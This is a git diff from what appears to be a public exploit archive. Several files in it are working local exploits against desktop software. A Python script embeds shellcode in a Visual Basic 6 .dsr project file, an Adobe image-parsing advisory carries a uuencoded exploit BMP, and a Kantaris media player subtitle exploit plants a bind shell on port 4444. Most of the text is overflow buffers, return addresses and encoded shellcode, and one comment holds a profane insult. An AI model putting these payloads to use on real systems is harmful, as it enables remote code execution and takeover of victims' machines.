-get_EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
-
-nop = "\x90" * 12
-
-shellcode = (
-    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
-    "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"
-    "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"
-    "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"
-    "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
-    "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
-    "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"
-    "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"
-    "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"
-    "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
-    "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
-    "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"
-    "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"
-    "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"
-    "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
-    "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"
-    "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"
-    "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
-    )
-
-dsrfile = (
-    "VERSION 5.00\n"
-    "Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n"
-    "   ClientHeight    =   6315\n"
-    "   ClientLeft      =   0\n"
-    "   ClientTop       =   0\n"
-    "   ClientWidth     =   7980\n"
-    "   _ExtentX        =   14076\n"
-    "   _ExtentY        =   11139\n"
-    "   FolderFlags     =   1\n"
-    '   TypeLibGuid     =   "{D7133993-3B5A-4667-B63B-749EF16A1840}"\n'
-    '   TypeInfoGuid    =   "{050E7898-66AC-4150-A213-47C7725D7E7E}"\n'
-    "   TypeInfoCookie  =   0\n"
-    "   Version         =   4\n"
-    "   NumConnections  =   1\n"
-    "   BeginProperty Connection1\n"
-    '      ConnectionName  =   "Connection1"\n'
-    "      ConnDispId      =   1001\n"
-    "      SourceOfData    =   3\n"
-    '      ConnectionSource=   ""\n'
-    "      Expanded        =   -1  'True\n"
-    "      QuoteChar       =   96\n"
-    "      SeparatorChar   =   46\n"
-    "   EndProperty\n"
-    "   NumRecordsets   =   1\n"
-    "   BeginProperty Recordset1\n"
-    '      CommandName     =   "Command1"\n'
-    "      CommDispId      =   1002\n"
-    "      RsDispId        =   1003\n"
-    '      CommandText     =   "' + buff + get_EIP + nop + shellcode + nop + '"\n'
-    '      ActiveConnectionName=   "Connection1"\n'
-    "      CommandType     =   2\n"
-    "      dbObjectType    =   1\n"
-    "      Locktype        =   3\n"
-    "      IsRSReturning   =   -1  'True\n"
-    "      NumFields       =   1\n"
-    "      BeginProperty Field1\n"
-    "         Precision       =   10\n"
-    "         Size            =   4\n"
-    "         Scale           =   0\n"
-    "         Type            =   3\n"
-    '         Name            =   "ID"\n'
-    '         Caption         =   "ID"\n'
-    "      EndProperty\n"
-    "      NumGroups       =   0\n"
-    "      ParamCount      =   0\n"
-    "      RelationCount   =   0\n"
-    "      AggregateCount  =   0\n"
-    "   EndProperty\n"
-    "End\n"
-    'Attribute VB_Name = "DataEnvironment1"\n'
-    "Attribute VB_GlobalNameSpace = False\n"
-    "Attribute VB_Creatable = True\n"
-    "Attribute VB_PredeclaredId = True\n"
-    "Attribute VB_Exposed = False\n"
-    )
-
-try:
-    out_file = open("DataEnvironment1.dsr",'w')
-    out_file.write(dsrfile)
-    out_file.close()
-    print "\nFILE CREATION COMPLETED!\n"
-except:
-    print " \n -------------------------------------"
-    print "  Usage: exploit.py"
-    print " -------------------------------------"
-    print "\nAN ERROR OCCURS DURING FILE CREATION!"
-
-# milw0rm.com [2008-04-04]
+#usage: exploit.py
+
+print "-----------------------------------------------------------------------"
+print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoF\n'
+print " author: shinnai"
+print " mail: shinnai[at]autistici[dot]org"
+print " site: http://shinnai.altervista.org\n"
+print " Once you create the file, open it with Visual Basic 6 and click on"
+print " command name."
+print "-----------------------------------------------------------------------"
+
+buff = "A" * 555
+
+get_EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
+
+nop = "\x90" * 12
+
+shellcode = (
+    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
+    "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"
+    "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"
+    "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"
+    "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
+    "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
+    "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"
+    "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"
+    "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"
+    "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
+    "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
+    "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"
+    "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"
+    "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"
+    "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
+    "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"
+    "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"
+    "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
+    )
+
+dsrfile = (
+    "VERSION 5.00\n"
+    "Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n"
+    "   ClientHeight    =   6315\n"
+    "   ClientLeft      =   0\n"
+    "   ClientTop       =   0\n"
+    "   ClientWidth     =   7980\n"
+    "   _ExtentX        =   14076\n"
+    "   _ExtentY        =   11139\n"
+    "   FolderFlags     =   1\n"
+    '   TypeLibGuid     =   "{D7133993-3B5A-4667-B63B-749EF16A1840}"\n'
+    '   TypeInfoGuid    =   "{050E7898-66AC-4150-A213-47C7725D7E7E}"\n'
+    "   TypeInfoCookie  =   0\n"
+    "   Version         =   4\n"
+    "   NumConnections  =   1\n"
+    "   BeginProperty Connection1\n"
+    '      ConnectionName  =   "Connection1"\n'
+    "      ConnDispId      =   1001\n"
+    "      SourceOfData    =   3\n"
+    '      ConnectionSource=   ""\n'
+    "      Expanded        =   -1  'True\n"
+    "      QuoteChar       =   96\n"
+    "      SeparatorChar   =   46\n"
+    "   EndProperty\n"
+    "   NumRecordsets   =   1\n"
+    "   BeginProperty Recordset1\n"
+    '      CommandName     =   "Command1"\n'
+    "      CommDispId      =   1002\n"
+    "      RsDispId        =   1003\n"
+    '      CommandText     =   "' + buff + get_EIP + nop + shellcode + nop + '"\n'
+    '      ActiveConnectionName=   "Connection1"\n'
+    "      CommandType     =   2\n"
+    "      dbObjectType    =   1\n"
+    "      Locktype        =   3\n"
+    "      IsRSReturning   =   -1  'True\n"
+    "      NumFields       =   1\n"
+    "      BeginProperty Field1\n"
+    "         Precision       =   10\n"
+    "         Size            =   4\n"
+    "         Scale           =   0\n"
+    "         Type            =   3\n"
+    '         Name            =   "ID"\n'
+    '         Caption         =   "ID"\n'
+    "      EndProperty\n"
+    "      NumGroups       =   0\n"
+    "      ParamCount      =   0\n"
+    "      RelationCount   =   0\n"
+    "      AggregateCount  =   0\n"
+    "   EndProperty\n"
+    "End\n"
+    'Attribute VB_Name = "DataEnvironment1"\n'
+    "Attribute VB_GlobalNameSpace = False\n"
+    "Attribute VB_Creatable = True\n"
+    "Attribute VB_PredeclaredId = True\n"
+    "Attribute VB_Exposed = False\n"
+    )
+
+try:
+    out_file = open("DataEnvironment1.dsr",'w')
+    out_file.write(dsrfile)
+    out_file.close()
+    print "\nFILE CREATION COMPLETED!\n"
+except:
+    print " \n -------------------------------------"
+    print "  Usage: exploit.py"
+    print " -------------------------------------"
+    print "\nAN ERROR OCCURS DURING FILE CREATION!"
+
+# milw0rm.com [2008-04-04]
diff --git a/platforms/windows/local/5479.txt b/platforms/windows/local/5479.txt
index 220f3ed7f..82c4d05c9 100755
--- a/platforms/windows/local/5479.txt
+++ b/platforms/windows/local/5479.txt
@@ -1,175 +1,175 @@
-Exploitable issue in various Adobe products
-c0ntex (c0ntexb@gmail.com) Scott Laurie
-February 2008
-
-Vulnerable applications, tested:
-Adobe Photoshop Album Starter
-Adobe After Effects CS3
-Adobe Photoshop CS3
-
-Not Vulnerable applications, tested:
-Adobe Reader
-Adobe Flash Player
-
-This bug is related to the parsing of header images, in that the applications
-do not verify that the image header is valid before trying to render it. This
-leaves an opportunity to cause an unchecked buffer overflow and allow for the
-execution of malicious code.
-
-All the issues are standard local overflows whereby an attacker can exploit a
-machine after sending the malicious image to the user, or by placing the image
-on a web site or email and waiting for a user to view it in one of the effected
-products.
-
-One fun thing with Album Starter is that it will run a service which will look
-for new devices being attached to the system, things like cameras or USB drives
-and when one is found it will check the device for image files. If some are
-found, the application will auto-run and import the images and thus allow the
-attacker to exploit locked workstations.. pretty lame but fun :)
-
-There is a caveats to the bug as the shellcode and return address need to be 4
-byte values. Thus a return address of 0x41424344 needs to be in the following
-format: "\x44\x44\x44\x44\x43\x43\x43\x43\x42\x42\x42\x42\x41\x41\x41\x41"
-
-
-Exploit attached for Album Starter 3.2 on Windows XP SP2 to pop calc.exe:
-Used shellcode is taken from the Metasploit project.
-
-
-begin 644 Adobe_AS_Exploit.bmp
-M0DTV`````````#8````H````0`8``+`$```!``@`04%!04%!04%!04%!04%!
-M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
-M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
-M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!
-M04%!04%!04%!04%!04%!04%!04'\:NM-Z/G___]@BVPD)(M%/(M\!7@![XM/
-M&(M?(`'K28LTBP'N,<"9K(3`="#!R@T*`<+K]#M4)"AUY8M?)`'K9HL,2XM?
-M'`'K`RR+B6PD'&'#,=MDBT,PBT`,BW`5F@>T(`E5J`O_0:-D)]:U7_]934U-34T-30U/_
-MT&9H!-)F4XGAE6BD&G#'5__6:A!15?_0:*2M+NE7_]935?_0:.5)ADE7_]90
-M5%15_]"3:.=YQGE7_]95_]!F:F1F:&-MB>5J4%DIS(GG:D2)XC'`\ZK^0BW^
-M0BR3C7HXJZNK:'+^LQ;_=43_UEM74E%146H!45%54?_0:*W9!GIZ=W=W=W9V=G9[N[N[MG9V=ET='1T)"0D)/3T]/1;6UM;@8&!@7-S
-MGIZ[^_O[\S,S,S#
-MP\/#T='1T=K:VMJLK*RLBXN+B[2TM+3?W]_?Y^?GYQ,3$Q/V]O;V:FIJ:N?G
-MY^?^_O[^75U=72\O+R_M[>WMAX>'AUM;6ULL+"PLS,S,S'Y^?GYA86%ANKJZ
-MN@,#`P..CHZ.+R\O+PL+"PNLK*RLU=75U7Y^?G[O[^_OS,S,S.SL[.S1T='1
-MXN+BXFQL;&P!`0$!!04%!?+R\O(F)B8F86%A8='1T='R\O+RK*RLK(N+BXNQ
-ML;&Q9V=G9WM[>WNNKJZN7EY>7BTM+2T6%A862DI*2CX^/CYE965E9V=G9[JZ
-MNKK?W]_?+BXN+E]?7U^&AH:&T='1T:ZNKJXK*RLK`0$!`2HJ*BKR\O+RBHJ*
-MB@$!`0$R,C(RYN;FYLS,S,R#@X.#T='1T6YN;FZ7EY>7BHJ*BEI:6EKN[N[N
-MK*RLK.+BXN)F9F9FL;&QL186%A9\?'Q\.CHZ.KBXN+BNKJZN'JVMK:V.CHZ.!04%!8:&AH:_O[^_='1T=-#0
-MT-#@X.#@<'!P<'5U=76]O;V]C8V-C49&1D;FYN;F.3DY.<#`P,!"0D)"\O+R
-1\C\_/S_N[N[N)R5F@>T(`E5J`O_0:-D)]:U7_]934U-34T-30U/_
+MT&9H!-)F4XGAE6BD&G#'5__6:A!15?_0:*2M+NE7_]935?_0:.5)ADE7_]90
+M5%15_]"3:.=YQGE7_]95_]!F:F1F:&-MB>5J4%DIS(GG:D2)XC'`\ZK^0BW^
+M0BR3C7HXJZNK:'+^LQ;_=43_UEM74E%146H!45%54?_0:*W9!GIZ=W=W=W9V=G9[N[N[MG9V=ET='1T)"0D)/3T]/1;6UM;@8&!@7-S
+MGIZ[^_O[\S,S,S#
+MP\/#T='1T=K:VMJLK*RLBXN+B[2TM+3?W]_?Y^?GYQ,3$Q/V]O;V:FIJ:N?G
+MY^?^_O[^75U=72\O+R_M[>WMAX>'AUM;6ULL+"PLS,S,S'Y^?GYA86%ANKJZ
+MN@,#`P..CHZ.+R\O+PL+"PNLK*RLU=75U7Y^?G[O[^_OS,S,S.SL[.S1T='1
+MXN+BXFQL;&P!`0$!!04%!?+R\O(F)B8F86%A8='1T='R\O+RK*RLK(N+BXNQ
+ML;&Q9V=G9WM[>WNNKJZN7EY>7BTM+2T6%A862DI*2CX^/CYE965E9V=G9[JZ
+MNKK?W]_?+BXN+E]?7U^&AH:&T='1T:ZNKJXK*RLK`0$!`2HJ*BKR\O+RBHJ*
+MB@$!`0$R,C(RYN;FYLS,S,R#@X.#T='1T6YN;FZ7EY>7BHJ*BEI:6EKN[N[N
+MK*RLK.+BXN)F9F9FL;&QL186%A9\?'Q\.CHZ.KBXN+BNKJZN'JVMK:V.CHZ.!04%!8:&AH:_O[^_='1T=-#0
+MT-#@X.#@<'!P<'5U=76]O;V]C8V-C49&1D;FYN;F.3DY.<#`P,!"0D)"\O+R
+1\C\_/S_N[N[N)R for helping
-# and discovering a very interesting thing that we will publish soon
-
-# 
-# I piss on your Business Networks course Igor Radusinovic! Go to hell!
-#
-# Vulnerability discovered by Muris Kurgas a.k.a. j0rgan
-# jorganwd [at] gmail [dot] com
-# http://www.jorgan.users.cg.yu
-
-
-import os
-
-jmp = '\xCC\x59\xFB\x77' # Windows XP sp1 JMP ESP, u can change it...
-
-# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
-sc=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
-"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
-"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x43\x4b\x48\x4e\x37"
-
-"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x38"
-"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x48"
-"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
-
-"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
-"\x46\x4f\x4b\x33\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x48"
-"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
-
-"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48"
-"\x49\x38\x4e\x36\x46\x42\x4e\x51\x41\x46\x43\x4c\x41\x33\x4b\x4d"
-"\x46\x56\x4b\x58\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x50\x4b\x38"
-
-"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x50\x50\x35\x4a\x36"
-"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
-"\x43\x35\x48\x56\x4a\x56\x43\x53\x44\x53\x4a\x36\x47\x37\x43\x57"
-
-"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
-"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e"
-"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50"
-
-"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
-"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
-"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x51"
-
-"\x4e\x55\x48\x46\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a"
-"\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x31"
-"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52"
-
-"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
-"\x4a\x36\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x45\x4f\x4f\x48\x4d"
-"\x42\x45\x46\x55\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
-
-"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45"
-"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x56\x48\x46\x4a\x36\x43\x36"
-"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x42\x4e\x4c"
-
-"\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x58\x44\x4e\x41\x43\x42\x4c"
-"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42"
-"\x43\x49\x4d\x48\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
-
-"\x44\x57\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x54\x4f\x4f"
-"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x55\x41\x55\x41\x35\x4c\x46"
-"\x41\x30\x41\x35\x41\x55\x45\x55\x41\x35\x4f\x4f\x42\x4d\x4a\x46"
-
-"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
-"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
-"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
-
-"\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
-"\x4f\x4f\x42\x4d\x5a")
-
-bafer = '\x41' * 163868 + jmp + "\x90" * 32 + sc
-
-fileHandle = open ( 'film.ssa', 'w' )
-
-fileHandle.write ( '[Script Info]\n') 
-fileHandle.write ( 'ScriptType: v4.00\n')
-fileHandle.write ( 'Title: Kantaris 0.3.4 buffer-overflow\n')
-fileHandle.write ( 'Collisions: Normal\n\n')
-
-fileHandle.write ( '[V4 Styles]\n\n')
-fileHandle.write ( '[Events]\n')
-
-fileHandle.write ( 'Dialogue: '+ bafer)
-fileHandle.close() 
-
-# milw0rm.com [2008-04-25]
+#!/usr/bin/python
+#
+# Kantaris 0.3.4 Media Player Local Buffer Overflow [0day!]
+#
+# The following exploit will make a film.ssa file, 
+# just rename the file with the name of your movie, and use your imagination
+
+# to pwn! :)
+# Shellcode is local bind shell, just telnet to port:4444 to get command prompt :)
+#
+# BIG thanks to muts  for helping
+# and discovering a very interesting thing that we will publish soon
+
+# 
+# I piss on your Business Networks course Igor Radusinovic! Go to hell!
+#
+# Vulnerability discovered by Muris Kurgas a.k.a. j0rgan
+# jorganwd [at] gmail [dot] com
+# http://www.jorgan.users.cg.yu
+
+
+import os
+
+jmp = '\xCC\x59\xFB\x77' # Windows XP sp1 JMP ESP, u can change it...
+
+# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum
+sc=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
+"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
+"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x43\x4b\x48\x4e\x37"
+
+"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x38"
+"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x48"
+"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c"
+
+"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
+"\x46\x4f\x4b\x33\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x48"
+"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44"
+
+"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48"
+"\x49\x38\x4e\x36\x46\x42\x4e\x51\x41\x46\x43\x4c\x41\x33\x4b\x4d"
+"\x46\x56\x4b\x58\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x50\x4b\x38"
+
+"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x50\x50\x35\x4a\x36"
+"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
+"\x43\x35\x48\x56\x4a\x56\x43\x53\x44\x53\x4a\x36\x47\x37\x43\x57"
+
+"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
+"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e"
+"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50"
+
+"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"
+"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
+"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x51"
+
+"\x4e\x55\x48\x46\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a"
+"\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x31"
+"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52"
+
+"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
+"\x4a\x36\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x45\x4f\x4f\x48\x4d"
+"\x42\x45\x46\x55\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
+
+"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45"
+"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x56\x48\x46\x4a\x36\x43\x36"
+"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x42\x4e\x4c"
+
+"\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x58\x44\x4e\x41\x43\x42\x4c"
+"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42"
+"\x43\x49\x4d\x48\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
+
+"\x44\x57\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x54\x4f\x4f"
+"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x55\x41\x55\x41\x35\x4c\x46"
+"\x41\x30\x41\x35\x41\x55\x45\x55\x41\x35\x4f\x4f\x42\x4d\x4a\x46"
+
+"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
+"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
+"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
+
+"\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d"
+"\x4f\x4f\x42\x4d\x5a")
+
+bafer = '\x41' * 163868 + jmp + "\x90" * 32 + sc
+
+fileHandle = open ( 'film.ssa', 'w' )
+
+fileHandle.write ( '[Script Info]\n') 
+fileHandle.write ( 'ScriptType: v4.00\n')
+fileHandle.write ( 'Title: Kantaris 0.3.4 buffer-overflow\n')
+fileHandle.write ( 'Collisions: Normal\n\n')
+
+fileHandle.write ( '[V4 Styles]\n\n')
+fileHandle.write ( '[Events]\n')
+
+fileHandle.write ( 'Dialogue: '+ bafer)
+fileHandle.close() 
+
+# milw0rm.com [2008-04-25]
diff --git a/platforms/windows/local/558.c b/platforms/windows/local/558.c
index 9e008ec5a..fe9efd5c2 100755
--- a/platforms/windows/local/558.c
+++ b/platforms/windows/local/558.c
@@ -114,6 +114,6 @@ argv[0]);
        printf("Exploit rar file %s has been generated!\n",argv[2]);
 
        fclose(di);
-}
-
-// milw0rm.com [2004-09-28]
+}
+
+// milw0rm.com [2004-09-28]
diff --git a/platforms/windows/local/5584.c b/platforms/windows/local/5584.c
index 6c7158690..a4f009de4 100755
--- a/platforms/windows/local/5584.c
+++ b/platforms/windows/local/5584.c
@@ -1,7368 +1,7368 @@
-/* 
-     Open Office.org 2.31 swriter local code execution exploit.
-     This bug has been patched in OOo 2.4.
-     Spawns calc.exe if successful.
-     
-     Marsupilamipowa@hotmail.fr
-*/
-
